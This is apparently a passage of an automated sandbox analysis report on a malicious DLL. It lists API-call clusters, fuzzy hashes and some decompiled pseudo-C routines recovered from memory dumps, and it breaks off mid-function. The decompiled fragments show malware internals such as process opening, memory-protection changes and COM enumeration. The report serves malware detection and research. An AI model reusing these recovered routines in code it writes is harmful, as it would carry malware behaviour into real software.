                • Opcode ID: dac328e05494398f51953741ba51f7816eefea9be983e4087a50c823dbd03497
                • Instruction ID: e9f591711afcc938f3c4619b6fe10f93e0ebe2cfb7d96fd1254e787fdae2e3ff
                • Opcode Fuzzy Hash: dac328e05494398f51953741ba51f7816eefea9be983e4087a50c823dbd03497
                • Instruction Fuzzy Hash: 48117F31941205EFEB05DF5AD889AA9B7F8FB14334B044069E4099B290F73AED05CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(046C158F,00000000,046E6C5B,00000000,046E4160,046C158F,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C4001
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(00000000,046C158F), ref: 046C4025
                • StrRChrA.SHLWAPI(046C158F,00000000,0000002E,?,00000003,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046C402C
                • lstrcpy.KERNEL32(00000000,?), ref: 046C4074
                • lstrcat.KERNEL32(00000000,?), ref: 046C4083
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                • String ID:
                • API String ID: 2616531654-0
                • Opcode ID: afd0921cd635080d3e8cd076315d08a74218fa356361ef85a10db13be9a787c4
                • Instruction ID: 7ff4597bebe1388c0af8a89f62d7cf70e7813b07941f3fcf8b77572f917fb845
                • Opcode Fuzzy Hash: afd0921cd635080d3e8cd076315d08a74218fa356361ef85a10db13be9a787c4
                • Instruction Fuzzy Hash: 0A115A76340206ABD320EF66E988E7B77ECEB84750F04452DF605C7242FB2AE8458772
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046DBDF1: lstrlen.KERNEL32(?,00000001,?,00000008,046DD288,?,00000000,00000001,00000000,04C9C088,04C9C088,00000000,046C832B,00000000,?,?), ref: 046DBDFD
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046D2684
                • memcpy.NTDLL(00000000,?,?), ref: 046D2697
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D26A8
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D26BD
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046D26F5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                • String ID:
                • API String ID: 2349942465-0
                • Opcode ID: 4d6ab8d7db3afbd9ae8b038eb22451068794f62d94af0049182442661e9e9b82
                • Instruction ID: 71bf0d12a6add35d5997b1277bac02f8867dbffe860411856cd60ecf85800178
                • Opcode Fuzzy Hash: 4d6ab8d7db3afbd9ae8b038eb22451068794f62d94af0049182442661e9e9b82
                • Instruction Fuzzy Hash: D611E576605351EFE711AF26DC44C2B7BE8EB85335705047EF80597240FA36AC058BB5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(046C78A1,00000000,00000000,00000000,?,046DAE43,?,046C78A1,00000000), ref: 046E4FA8
                • lstrlen.KERNEL32(?,?,046DAE43,?,046C78A1,00000000), ref: 046E4FAF
                • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 046E4FBD
                  • Part of subcall function 046CD2FC: GetLocalTime.KERNEL32(046DAE43,046DAE43,?,046C78A1,00000000), ref: 046CD306
                  • Part of subcall function 046CD2FC: wsprintfA.USER32 ref: 046CD339
                • wsprintfA.USER32 ref: 046E4FDF
                  • Part of subcall function 046E3B15: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,046E5007,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 046E3B33
                  • Part of subcall function 046E3B15: wsprintfA.USER32 ref: 046E3B58
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 046E5010
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                • String ID:
                • API String ID: 3847261958-0
                • Opcode ID: 7b1e1dc25693ff236910a5704ec414c0bb6c98060291948c5fecd2db565bd1e9
                • Instruction ID: 5a1a38d500a61b557d8bc11b713c130f4a9e054aabacc209887fd2f4e4913ced
                • Opcode Fuzzy Hash: 7b1e1dc25693ff236910a5704ec414c0bb6c98060291948c5fecd2db565bd1e9
                • Instruction Fuzzy Hash: 06015235540218BFDB216F56DC48DAB7FA9EB84364B004421FD099B211F6369D65DBB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 046DFEBB
                  • Part of subcall function 046C2A41: wcstombs.NTDLL ref: 046C2AFF
                • lstrlen.KERNEL32(?,?,?,?,?,046DF400,?,?), ref: 046DFEDE
                • lstrlen.KERNEL32(?,?,?,?,046DF400,?,?), ref: 046DFEE8
                • memcpy.NTDLL(?,?,00004000,?,?,046DF400,?,?), ref: 046DFEF9
                • HeapFree.KERNEL32(00000000,?,?,?,?,046DF400,?,?), ref: 046DFF1B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                • String ID:
                • API String ID: 1256246205-0
                • Opcode ID: 5d2519c16168153f032aa110d530ce6f3579a85b0b2dbbdd270b208290c0414e
                • Instruction ID: 5836509465b19015097b8a3b62c310bcea3f4b888eaab59a5c89e73d5054c9e1
                • Opcode Fuzzy Hash: 5d2519c16168153f032aa110d530ce6f3579a85b0b2dbbdd270b208290c0414e
                • Instruction Fuzzy Hash: 37118E75A00204FFDB249F55EC44F5A7BF9EB85310F104028E806E7250F632AD519B24
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,046D7126,?), ref: 046E2E9A
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046E2EAC
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EC9
                • lstrlenW.KERNEL32(00000000,?,?,046D7126,?), ref: 046E2ED5
                • HeapFree.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EE9
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                • String ID:
                • API String ID: 3403466626-0
                • Opcode ID: 8b37d7b70f2e9b2d00c40f054f019fe1cc7b48e2193c14664cdb2cea6d078e6d
                • Instruction ID: 7fa4afbb3ce3a6356a4af272ce9fd356738c971225092736947c87c4595c2a14
                • Opcode Fuzzy Hash: 8b37d7b70f2e9b2d00c40f054f019fe1cc7b48e2193c14664cdb2cea6d078e6d
                • Instruction Fuzzy Hash: 73018C72101214EFE312EF9AEC44FAA37ECEB48310F140065F504AB210E779AD058F75
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32 ref: 046DDC2D
                • GetModuleHandleA.KERNEL32 ref: 046DDC3B
                • LoadLibraryExW.KERNEL32(?,?,?), ref: 046DDC48
                • GetModuleHandleA.KERNEL32 ref: 046DDC5F
                • GetModuleHandleA.KERNEL32 ref: 046DDC6B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleModule$LibraryLoad
                • String ID:
                • API String ID: 1178273743-0
                • Opcode ID: 81cd00f212fcd5008c4619d697bae8dc8e34301e97b4b0dc63441cad89d12eaa
                • Instruction ID: c4f592555fd77c9f70f132b0e8ec95c63661e2b40d420eeafb0ef83e712b53be
                • Opcode Fuzzy Hash: 81cd00f212fcd5008c4619d697bae8dc8e34301e97b4b0dc63441cad89d12eaa
                • Instruction Fuzzy Hash: BD0186B1A0130ABF9B016F6AEC4096A7BEDFF14360704403AF814C7264FBB6DC219E90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,046C130F), ref: 046E4929
                • StrTrimA.SHLWAPI(00000001,?,?,046C130F), ref: 046E494C
                • StrTrimA.SHLWAPI(00000000,?,?,046C130F), ref: 046E495B
                • _strupr.NTDLL ref: 046E495E
                • lstrlen.KERNEL32(00000000,046C130F), ref: 046E4966
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Trim$_struprlstrlen
                • String ID:
                • API String ID: 2280331511-0
                • Opcode ID: ce2f9a031835542e0cdaa3d91914dc68dfcaba2ef540128eadd033a3cd7d81f7
                • Instruction ID: 3bed8b96a8c241bfbc9d9de2bf2d72c66407c8a9e9d6ba37a9e4d70dc3ef8df8
                • Opcode Fuzzy Hash: ce2f9a031835542e0cdaa3d91914dc68dfcaba2ef540128eadd033a3cd7d81f7
                • Instruction Fuzzy Hash: 54F09071701156AFE715EB36EC8CE7A3BECEB45654B101019F849CB241FF18AC018B61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046DA70B
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046DA71C
                • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,046C9C93,00000000,?,046EE4A8,046D0749,00000003,?,?,?,046C8E76), ref: 046DA733
                • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,046C9C93,00000000,?,046EE4A8,046D0749,00000003,?,?,?,046C8E76), ref: 046DA74D
                • GetLastError.KERNEL32(?,?,046C9C93,00000000,?,046EE4A8,046D0749,00000003,?,?,?,046C8E76,00000000,?,00000029,046EE218), ref: 046DA75A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                • String ID:
                • API String ID: 653387826-0
                • Opcode ID: 2883646e55b95d7c04e1594af717b6d66dee6879a586892b57a620cd658a01e7
                • Instruction ID: 355c5cb9ca426a99d9c116436f479d31199e3b2249f2a187202fe975617db58c
                • Opcode Fuzzy Hash: 2883646e55b95d7c04e1594af717b6d66dee6879a586892b57a620cd658a01e7
                • Instruction Fuzzy Hash: 5401AD79600304EFD721AF66CC04D6AB7F9EF84320B108529EA529B390E771FD02CB64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C1500B(intOrPtr _a4) {
                				void* _t2;
                				long _t4;
                				void* _t5;
                				long _t6;
                				void* _t7;
                				void* _t13;
                
                				_t2 = CreateEventA(0, 1, 0, 0);
                				 *0x1c1a2c4 = _t2;
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				_t4 = GetVersion();
                				if(_t4 != 5) {
                					L4:
                					if(_t13 <= 0) {
                						_t5 = 0x32;
                						return _t5;
                					}
                					L5:
                					 *0x1c1a2b4 = _t4;
                					_t6 = GetCurrentProcessId();
                					 *0x1c1a2b0 = _t6;
                					 *0x1c1a2bc = _a4;
                					_t7 = OpenProcess(0x10047a, 0, _t6);
                					 *0x1c1a2ac = _t7;
                					if(_t7 == 0) {
                						 *0x1c1a2ac =  *0x1c1a2ac | 0xffffffff;
                					}
                					return 0;
                				}
                				if(_t4 > 0) {
                					goto L5;
                				}
                				_t13 = _t4 - _t4;
                				goto L4;
                			}
                Address column of the decompiler view for the function above: 0x01c15013, 0x01c1501b, 0x01c15020, 0x00000000, 0x01c15075, 0x01c15022, 0x01c1502a, 0x01c15032, 0x01c15032, 0x01c15072, 0x00000000, 0x01c15072, 0x01c15034, 0x01c15034, 0x01c15039, 0x01c1504b, 0x01c15050, 0x01c15056, 0x01c1505e, 0x01c15063, 0x01c15065, 0x01c15065, 0x00000000, 0x01c1506c, 0x01c1502e, 0x00000000, 0x00000000, 0x01c15030, 0x00000000

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01C16D63,?), ref: 01C15013
                • GetVersion.KERNEL32 ref: 01C15022
                • GetCurrentProcessId.KERNEL32 ref: 01C15039
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01C15056
                • GetLastError.KERNEL32 ref: 01C15075
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID:
                • API String ID: 2270775618-0
                • Opcode ID: 8623cc0dc49d4a90f05d80d2955e4a72b1fab5e402903020615d330918308b6b
                • Instruction ID: 1a421cfef2847200b8dd99a05e3757b929c67f47c037e2d78250840eb3edfd7a
                • Opcode Fuzzy Hash: 8623cc0dc49d4a90f05d80d2955e4a72b1fab5e402903020615d330918308b6b
                • Instruction Fuzzy Hash: 49F087306C2341EFE730CBA8A8287A63E60B7ABB50F004118E68BC72CCD271C101CF56
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentThreadId.KERNEL32 ref: 046D7630
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046D7640
                • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046D7649
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,046DC365,?,?,00000040,?,?,?,?,?,?,046D5DB1), ref: 046D7667
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,046DC365,?,?,00000040,?,?,?,?,?,?,046D5DB1), ref: 046D7674
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                • String ID:
                • API String ID: 3667519916-0
                • Opcode ID: d54b9724530b8d82e3fb47c412f9149d243cf6fc65f99a2296b256a13cbc7d61
                • Instruction ID: e413ddaa4c65c11a7f0a60c55778f9463b80439aaf6fac7ad7741c5f83031b08
                • Opcode Fuzzy Hash: d54b9724530b8d82e3fb47c412f9149d243cf6fc65f99a2296b256a13cbc7d61
                • Instruction Fuzzy Hash: 81F01730600740AFE7307A3A9C88F2AB2E8EB94356F145618F54197690FB28FC05CA69
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,046CB037,?), ref: 046E3AAA
                • GetVersion.KERNEL32 ref: 046E3AB9
                • GetCurrentProcessId.KERNEL32 ref: 046E3AD0
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 046E3AED
                • GetLastError.KERNEL32 ref: 046E3B0C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID:
                • API String ID: 2270775618-0
                • Opcode ID: 1d0f09a29ac8a09e4679ebe78b23e9ac6dafa73eb72719b145a77f04ad9dd52c
                • Instruction ID: aba257891f8fd61049bfe116bf96548b9b5b8257fa82fc160f3fea41e3d35026
                • Opcode Fuzzy Hash: 1d0f09a29ac8a09e4679ebe78b23e9ac6dafa73eb72719b145a77f04ad9dd52c
                • Instruction Fuzzy Hash: 37F0AF70641302DEE7209F27E809B653BE0EB20704F206518E922CF3C0F37A58C1DB24
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 046DB38C
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • wsprintfA.USER32 ref: 046DB3BD
                  • Part of subcall function 046CE3A4: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,046C6410), ref: 046CE3BA
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE3E2
                  • Part of subcall function 046CE3A4: lstrlen.KERNEL32(?), ref: 046CE3F1
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE431
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE466
                  • Part of subcall function 046CE3A4: memcpy.NTDLL(00000000,?,?), ref: 046CE473
                  • Part of subcall function 046CE3A4: memcpy.NTDLL(00000008,046E83F8,00000002,00000000,?,?), ref: 046CE488
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE4AB
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 046DB432
                  • Part of subcall function 046E5DDB: RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E5DF1
                  • Part of subcall function 046E5DDB: RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E5E0C
                • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 046DB41C
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 046DB428
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                • String ID:
                • API String ID: 3553201432-0
                • Opcode ID: c015825ab77aae39429010d0e7f781a0882d568b98ab9f572173e50f1a972a46
                • Instruction ID: 0f23ce84dd108906be374559ba0f12d2ec6478b4b80eab1eb4306a80abd5be16
                • Opcode Fuzzy Hash: c015825ab77aae39429010d0e7f781a0882d568b98ab9f572173e50f1a972a46
                • Instruction Fuzzy Hash: FC21FB76900249BFDF11DF96DC44C9F7BB9FF48304B04442AF9059A210E776AA60DF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046E59C9: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 046E59E4
                  • Part of subcall function 046E59C9: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 046E5A32
                  • Part of subcall function 046E59C9: GetProcAddress.KERNEL32(00000000,?), ref: 046E5A4B
                  • Part of subcall function 046E59C9: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 046E5A9C
                • GetLastError.KERNEL32(?,?,?), ref: 046C29CC
                • FreeLibrary.KERNEL32(?,?,?), ref: 046C2A34
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                • String ID:
                • API String ID: 1730969706-0
                • Opcode ID: 8fc0cba10e8f0b1cb18de619de207fc36ea44c540a73f27e704f40f1e5ed6088
                • Instruction ID: a014bca5af8dbde6a5187c3a9ec80af5bca36123c8a59a12468c6110d87b2e0d
                • Opcode Fuzzy Hash: 8fc0cba10e8f0b1cb18de619de207fc36ea44c540a73f27e704f40f1e5ed6088
                • Instruction Fuzzy Hash: B071F871D0020AEFCF10DFE5D8949AEBBB9FF48314B1085ADE915AB250E735A941CF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(?), ref: 01C16810
                • SysFreeString.OLEAUT32(?), ref: 01C168F3
                  • Part of subcall function 01C11079: SysAllocString.OLEAUT32(01C192B0), ref: 01C110C9
                • SafeArrayDestroy.OLEAUT32(?), ref: 01C16947
                • SysFreeString.OLEAUT32(?), ref: 01C16955
                  • Part of subcall function 01C1309D: Sleep.KERNEL32(000001F4), ref: 01C130E5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$AllocFree$ArrayDestroySafeSleep
                • String ID:
                • API String ID: 3193056040-0
                • Opcode ID: 49ea75ac89e75a374869e967bb67448ee6b43a460893e8e25a33e592936e6385
                • Instruction ID: cfaa51f092333c86cb5719d1d5d1ff3d545c76ab57f75b418289ec71eae54426
                • Opcode Fuzzy Hash: 49ea75ac89e75a374869e967bb67448ee6b43a460893e8e25a33e592936e6385
                • Instruction Fuzzy Hash: D851737294029AEFDB00DFE8C8849EEB7B6FF89300B188868E645DB214D771DD45DB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E01C11079(intOrPtr* __eax) {
                				void* _v8;
                				WCHAR* _v12;
                				void* _v16;
                				char _v20;
                				void* _v24;
                				intOrPtr _v28;
                				void* _v32;
                				intOrPtr _v40;
                				short _v48;
                				intOrPtr _v56;
                				short _v64;
                				intOrPtr* _t54;
                				intOrPtr* _t56;
                				intOrPtr _t57;
                				intOrPtr* _t58;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr* _t63;
                				intOrPtr* _t65;
                				intOrPtr* _t67;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr* _t74;
                				intOrPtr* _t76;
                				intOrPtr _t78;
                				intOrPtr* _t82;
                				intOrPtr* _t86;
                				intOrPtr _t102;
                				intOrPtr _t108;
                				void* _t117;
                				void* _t121;
                				void* _t122;
                				intOrPtr _t129;
                
                				_t122 = _t121 - 0x3c;
                				_push( &_v8);
                				_push(__eax);
                				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                				if(_t117 >= 0) {
                					_t54 = _v8;
                					_t102 =  *0x1c1a2d8; // 0x55d5a8
                					_t5 = _t102 + 0x1c1b038; // 0x3050f485
                					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                					_t56 = _v8;
                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                					if(_t117 >= 0) {
                						__imp__#2(0x1c192b0);
                						_v28 = _t57;
                						if(_t57 == 0) {
                							_t117 = 0x8007000e;
                						} else {
                							_t60 = _v32;
                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                							_t86 = __imp__#6;
                							_t117 = _t61;
                							if(_t117 >= 0) {
                								_t63 = _v24;
                								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                								if(_t117 >= 0) {
                									_t129 = _v20;
                									if(_t129 != 0) {
                										_v64 = 3;
                										_v48 = 3;
                										_v56 = 0;
                										_v40 = 0;
                										if(_t129 > 0) {
                											while(1) {
                												_t67 = _v24;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t122 = _t122;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                												if(_t117 < 0) {
                													goto L16;
                												}
                												_t69 = _v8;
                												_t108 =  *0x1c1a2d8; // 0x55d5a8
                												_t28 = _t108 + 0x1c1b0bc; // 0x3050f1ff
                												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                												if(_t117 >= 0) {
                													_t74 = _v16;
                													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                													if(_t117 >= 0 && _v12 != 0) {
                														_t78 =  *0x1c1a2d8; // 0x55d5a8
                														_t33 = _t78 + 0x1c1b078; // 0x76006f
                														if(lstrcmpW(_v12, _t33) == 0) {
                															_t82 = _v16;
                															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                														}
                														 *_t86(_v12);
                													}
                													_t76 = _v16;
                													 *((intOrPtr*)( *_t76 + 8))(_t76);
                												}
                												_t71 = _v8;
                												 *((intOrPtr*)( *_t71 + 8))(_t71);
                												_v40 = _v40 + 1;
                												if(_v40 < _v20) {
                													continue;
                												}
                												goto L16;
                											}
                										}
                									}
                								}
                								L16:
                								_t65 = _v24;
                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                							}
                							 *_t86(_v28);
                						}
                						_t58 = _v32;
                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                					}
                				}
                				return _t117;
                			}

                APIs
                • SysAllocString.OLEAUT32(01C192B0), ref: 01C110C9
                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 01C111AB
                • SysFreeString.OLEAUT32(00000000), ref: 01C111C4
                • SysFreeString.OLEAUT32(?), ref: 01C111F3
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$Free$Alloclstrcmp
                • String ID:
                • API String ID: 1885612795-0
                • Opcode ID: 5b393e7668c9423685cc9d409b21d7ff23692719e163d07245fe477e157c0d9e
                • Instruction ID: 31eaedbb341158589c4a360e01f78cc3d4bccfa16a6417522bbbd4b15e2177f1
                • Opcode Fuzzy Hash: 5b393e7668c9423685cc9d409b21d7ff23692719e163d07245fe477e157c0d9e
                • Instruction Fuzzy Hash: 75513C75D0051ADFCB01DFE8C8889AEF7B5FF8A704B244594EA15AB214D735DE01DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E01C158DD(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				void _v156;
                				void _v428;
                				void* _t55;
                				unsigned int _t56;
                				signed int _t66;
                				signed int _t74;
                				void* _t76;
                				signed int _t79;
                				void* _t81;
                				void* _t92;
                				void* _t96;
                				signed int* _t99;
                				signed int _t101;
                				signed int _t103;
                				void* _t107;
                
                				_t92 = _a12;
                				_t101 = __eax;
                				_t55 = E01C14BA2(_a16, _t92);
                				_t79 = _t55;
                				if(_t79 == 0) {
                					L18:
                					return _t55;
                				}
                				_t56 =  *(_t92 + _t79 * 4 - 4);
                				_t81 = 0;
                				_t96 = 0x20;
                				if(_t56 == 0) {
                					L4:
                					_t97 = _t96 - _t81;
                					_v12 = _t96 - _t81;
                					E01C1367D(_t79,  &_v428);
